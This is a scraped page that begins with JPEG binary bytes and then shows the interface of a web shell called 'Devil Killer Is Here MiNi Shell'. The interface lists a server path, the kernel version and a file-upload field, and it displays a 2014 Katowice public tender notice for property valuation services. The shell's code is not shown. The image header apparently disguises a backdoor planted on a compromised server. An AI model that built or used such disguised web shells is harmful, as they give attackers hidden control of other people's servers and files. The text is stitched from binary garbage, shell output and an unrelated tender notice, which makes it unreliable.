JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140220/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140220/59482-N-2014.html

<p class="kh_header"><b>Katowice: Wykonywanie wycen nieruchomości w roku 2014 na terenie Miasta Katowice</b><br>
<b>Numer ogłoszenia: 59482 - 2014; data zamieszczenia: 20.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Katowice , ul. Młyńska 4, 40-098 Katowice, woj. śląskie, tel. 32 2593302, faks 32 2593303.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.katowice.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie wycen nieruchomości w roku 2014 na terenie Miasta Katowice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonywanie wycen nieruchomości  w roku 2014 na terenie Miasta Katowice
 
Zamówienie dzieli się na dwa zadania (części):
 
Zadanie nr 1 -      wycena nieruchomości lokalowych
 
a) wycena 310 lokali mieszkalnych,
b) wycena 30 lokali użytkowych,
c) wycena 70 lokali garażowych,
d) sporządzenie inwentaryzacji 22 lokali,
e) sporządzenie 235 rzutów kondygnacji z zaznaczonymi lokalami lub pomieszczeniami     przynależnymi,
f) sporządzenie 40 rzutów kondygnacji piwnic z zaznaczeniem wszystkich piwnic
 
Zadanie nr 2 -      wycena nieruchomości gruntowych niezabudowanych i zabudowanych
w podanych poniżej ilościach w tym:
 
1. Wycena nieruchomości gruntowej w celu nabywania, zbywania
    nieruchomości, regulacji stanów prawnych, zniesienia współwłasności,
    ustalenia opłat z tytułu użytkowania wieczystego w tym:
a) o powierzchni do           5000 m2  (200 nieruchomości)
b) o powierzchni powyżej 5000 m2     (60 nieruchomości)
2. Wycena nieruchomości gruntowej niezabudowanej 
    lub zabudowanej w celu jej sprzedaży na rzecz
    użytkownika wieczystego lub przekształcenia
    prawa użytkowania wieczystego w prawo własności (110 nieruchomości)
3. Wycena udziałów w nieruchomości gruntowej w obrębie
    wspólnot mieszkaniowych i garażowych w celu przekształcenia
    prawa użytkowania wieczystego w prawo własności
    dla nieruchomości :
a) do 5 udziałów  (10 udziałów)
b) każdy następny udział  (10 udziałów)
4. Wycena nieruchomości gruntowej w celu zbycia
    nieruchomości na poprawę warunków zagospodarowania  (22 nieruchomości)
5.Wycena nieruchomości gruntowej w celu ustalenia
    odszkodowania za grunty pod drogami publicznymi
    i innymi wywłaszczonymi nieruchomościami  (77 nieruchomości)
6. Wycena nieruchomości w celu ustalenia odszkodowania
    za nieruchomości przeznaczone na realizację inwestycji
    drogowych:                                                                                  
    a) wycena nieruchomości gruntowej  (110 nieruchomości)
    b) dodatkowe określenie wartości rynkowej składnika roślinnego  (32 nieruchomości)
    c) dodatkowe określenie wartości rynkowej składnika budowlanego (25 nieruchomości)
7. Wycena nieruchomości gruntowych w celu ustalenia
    odszkodowania za zniszczony składnik roślinny spowodowany
    czasowym zajęciem nieruchomości w związku z prowadzoną
    inwestycją miejską   (4 nieruchomości)
8. Wycena składnika roślinnego w celu ustalenia wysokości
    odszkodowania za drzewa i krzewy usuwane przez
    właściciela urządzeń przesyłowych z terenu Miasta Katowice (10 nieruchomości)
9.Wycena  nieruchomości zabudowanej domem
      jednorodzinnym   (20 nieruchomości)
10. Wycena  nieruchomości zabudowanej budynkami
      mieszkalnymi wielorodzinnymi   (6 nieruchomości)
11. Wycena  nieruchomości zabudowanej budynkami
      przemysłowymi, handlowymi, usługowymi, gospodarczymi   (20 nieruchomości)
12. Wycena  nieruchomości zabudowanej budynkami
      użyteczności publicznej  (7 nieruchomości)
13. Wycena nieruchomości zabudowanej budowlą  (3 nieruchomości)
14. Inwentaryzacja budynków o łącznej powierzchni użytkowej:
      a) do 1500m2     (12 inwentaryzacji)
      b) powyżej 1500m2   (6 inwentaryzacji)
15. Wycena określająca wysokość jednorazowego
      wynagrodzenia za ustanowienie służebności przesyłu   (26 wycen)
16. Wycena określająca wysokość jednorazowego
      wynagrodzenia za ustanowienie służebności gruntowej
      polegającej na:
      - prawie przechodu i przejazdu   (35 wycen)
      - dostępie do urządzeń infrastruktury technicznej  (8 wycen)
1).Zamawiający zastrzega sobie prawo opcji, polegające na zmniejszeniu ilości usług w zależności od potrzeb Zamawiającego,  maksymalnie o 30 % w stosunku do zakresu określonego dla każdego zadania (części).
2). W ramach zamówienia Wykonawca zobowiązany jest do:
wykonywania wycen nieruchomości zgodnie ze szczegółowym opisem przedmiotu zamówienia. Przedmiot zamówienia został określony z uwzględnieniem postanowień rozdziału 2 ustawy.
3). Szczegółowy zakres zamówienia został określony w załączniku nr 8 do SIWZ. Pozostałe warunki dotyczące realizacji zamówienia zostały określone w projekcie umowy (załącznik nr 7 do SIWZ).
4).Ilości wskazane w załączniku nr 8 do specyfikacji są wielkościami orientacyjnymi,przyjętymi dla celu porównania ofert i wyboru najkorzystniejszej oferty. Wykonawcy,z którym zamawiający podpisze umowę, nie przysługuje roszczenie o realizację usługi w wielkościach podanych w tabeli (zał. nr 8). Jednocześnie Zamawiający gwarantuje, iż minimalna kwota, która zostanie zapłacona z tytułu realizacji przedmiotu umowy wyniesie 50% ceny podanej w formularzu ofertowym..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 70.00.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1) Wykonawca powinien zgodnie z art. 45 ust. 3 ustawy przed upływem terminu składania ofert  wnieść wadium przetargowe w wysokości:
na zadanie nr 1 - 2.100 zł
na zadanie nr 2 - 6.000 zł
2)      Wadium  może być wnoszone w jednej lub kilku następujących formach:
a)      pieniądzu;
b)      poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo -kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)      gwarancjach bankowych;
d)      gwarancjach ubezpieczeniowych;
e)  poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116 poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).
Wadium wnoszone w pieniądzu wpłaca się  przelewem na rachunek bankowy na nw. konto Urzędu Miasta Katowice: ING Bank Śląski S.A. VII Oddział w Katowicach ul. Sokolska 34 nr 58 1050 1214 1000 0007 0000 5481 z dopiskiem - wadium dla zamówienia pn. wykonywanie wycen nieruchomości  w roku 2014 na terenie Miasta Katowice.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przepisy prawa nie nakładają obowiązku posiadania uprawnień do wykonywania usług
będących przedmiotem zamówienia. Zamawiający nie wyznacza szczególnego warunku  w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)   Posiadania wiedzy i doświadczenia; tj w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie  wykonali, a w przypadku świadczeń okresowych lub ciągłych wykonują  usługi w zakresie wycen nieruchomości oraz przedłożą dowody czy zostały wykonane lub są wykonywane należycie w ilości:
  dla zadania nr 1:    
-   300 wycen nieruchomości lokalowych;
  dla zadania nr 2:   
- 300 wycen nieruchomości gruntowych,
-  50 wycen nieruchomości zabudowanych (z wyłączeniem wycen nieruchomości lokalowych),
-   50 wycen w zakresie wycen określających jednorazowe wynagrodzenie za ustanowienie służebności.
Zamawiający dokona  oceny spełniania warunków udziału w postępowaniu na podstawie wymienionych w części IV niniejszej  specyfikacji dokumentów i oświadczeń złożonych przez Wykonawcę wraz z ofertą. Oświadczenia i dokumenty będą oceniane pod względem   formalno-prawnym, pod względem ich aktualności i treści, a także, czy informacje w nich zawarte potwierdzają spełnienie wymagań Zamawiającego. Sposób oceny spełniania warunków wymaganych od Wykonawców będzie dokonywany na podstawie przedłożonych w ofercie dokumentów wymienionych w części IV oraz będzie zgodny z formułą  SPEŁNIA/ NIE SPEŁNIA.
  Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi  stosunków. Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi  do realizacji zamówienia   w szczególności,  przedstawiając w tym celu pisemne zobowiązanie podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania  osobami zdolnymi do wykonania zamówienia
 
  a) dysponują osobami, które będą uczestniczyć w wykonywaniu zamówieniaw szczególności odpowiedzialnych za świadczenie usług, tj.
 
   na zadanie nr 1:
 
-  dwoma rzeczoznawcami majątkowymi oraz jedną osobą posiadającą uprawnienia   budowlane
  na zadanie nr 2
 
-  trzema rzeczoznawcami majątkowymi oraz  jedną osobą posiadającą uprawnienia  budowlane
   Osoba wykazana do wykonania jednego zadania nie może być wskazana jako wykonująca drugie zadanie.
 
 Rzeczoznawcy majątkowi  zaproponowani do wykonania zamówienia winni stale doskonalić swoje kwalifikacje zawodowe zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 14 lipca  2010r.  w sprawie wymogów programowych dla kursów specjalistycznych, szkoleń lub seminariów, mających na celu doskonalenie kwalifikacji zawodowych przez rzeczoznawców majątkowych, pośredników w obrocie nieruchomościami oraz zarządców nieruchomości (Dz.U.Nr 127 z 2010r. poz. 859).
 
 Zamawiający dokona  oceny spełniania warunków udziału w postępowaniu na podstawie wymienionych w części IV niniejszej  specyfikacji dokumentów i oświadczeń złożonych przez Wykonawcę wraz z ofertą. Oświadczenia i dokumenty będą oceniane pod względem formalno-prawnym, pod względem ich aktualności i treści, a także, czy informacje w nich zawarte potwierdzają spełnienie wymagań Zamawiającego.Sposób oceny spełniania warunków wymaganych od Wykonawców będzie dokonywany na podstawie przedłożonych w ofercie dokumentów wymienionych w części IV oraz będzie zgodny z formułą  SPEŁNIA/ NIE SPEŁNIA.
 Wykonawca może polegać na
wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi  stosunków. Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi  do realizacji zamówienia  w szczególności,  przedstawiając w tym celu pisemne zobowiązanie podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, potwierdzający doświadczenie wykonawcy w zakresie wycen nieruchomości wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są  wykonywane należycie. Wykaz należy sporządzić według wzoru stanowiącego załącznik nr 5 do specyfikacji.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Ofertę na formularzu oferty, o treści zgodnej z określoną we wzorze stanowiącym załącznik do specyfikacji wraz z oświadczeniem o spełnieniu warunków udziału w postępowaniu.
2) W przypadku gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia (np. spółki cywilne, konsorcja) - Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu  o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Fakt ustanowienia pełnomocnika należy udokumentować dołączeniem pełnomocnictwa podpisanego przez wszystkich Wykonawców wspólnie ubiegających się  o zamówienie. Pełnomocnictwo winno być w formie oryginału lub notarialnie poświadczonej kopii.
3) Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy.
4) W przypadku gdy Wykonawcą wspólnie ubiegającym się o zamówienie jest konsorcjum  w celu wykazania braku podstaw do wykluczenia takiego Wykonawcy z postępowania dokumenty wymienione w pkt 16.3 lit. a-d, a także pkt 16.4 należy przedstawić  dla każdego z partnerów konsorcjum osobno.
5) W przypadku gdy Wykonawcą wspólnie ubiegającym się o zamówienie jest  spółka cywilna,  w celu wykazania braku podstaw do wykluczenia takiego Wykonawcy z postępowania  dokumenty wymienione w pkt 16.3 lit. a-d, a także pkt 16.3 należy przedstawić  dla każdego ze wspólników spółki osobno,  z tym że:
- zaświadczenie właściwego naczelnika urzędu skarbowego należy przedstawić osobno dla  spółki  w zakresie podatku VAT  i osobno dla wspólników w zakresie podatku dochodowego,
- zaświadczenie właściwego oddziału ZUS lub KRUS należy przedstawić osobno dla wspólników  spółki oraz w przypadku gdy spółka cywilna zobowiązana jest do odprowadzania składki ZUS również dla spółki.
6) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wykaz usług   o którym mowa w pkt 16.2a SIWZ składają w/w Wykonawcy wspólnie .
7) Dokumenty,  dotyczące przynależności do tej samej grupy kapitałowej  określone w punkcie 16.5 wraz z ofertą winien przedłożyć  każdy z Wykonawców  wspólnie  ubiegających się o zamówienie.
8) W przypadku określonym w punkcie 15 części III SIWZ - pisemne zobowiązanie tych podmiotów, że oddane zostaną do dyspozycji Wykonawcy niezbędne zasoby na okres korzystania z nich przy wykonywaniu zamówienia - zgodnie z wzorem załączonym do SIWZ wraz z dokumentami o których mowa w pkt 16.e.
9) Jeżeli Wykonawca, wykazując spełnienie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów wymaga załączenia do oferty dokumentów dotyczących w szczególności:
- zakresu dostępnych Wykonawcy zasobów innego podmiotu, przez Wykonawcę przy wykonywaniu zamówienia;
- sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę przy wykonywaniu zamówieniu;
- charakteru stosunku jaki będzie łączył Wykonawcę  z innym podmiotem;
- zakresu i okresu udziału podmiotu, który reprezentuje przy wykonaniu zamówienia.
10). Dowód wniesienia wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień umowy może nastąpić wyłącznie na warunkach określonych poniżej :
a) Zamawiający z ważnych przyczyn nie dających się przewidzieć w chwili zawarcia umowy wstrzyma wykonanie prac;
b) nastąpi zmiana obowiązującej stawki VAT;
c) zaistniały przyczyny niezależne od działania stron, których przy zachowaniu wszelkich należytych środków nie można było uniknąć ani im zapobiec.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.um.katowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Katowice Wydział Gospodarki Mieniem 40-098 Katowice, ul. Młyńska 4, pokój 602.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.03.2014 godzina 11:45, miejsce: 40-098 Katowice ul. Młyńska 4 pokój 611 - VI piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
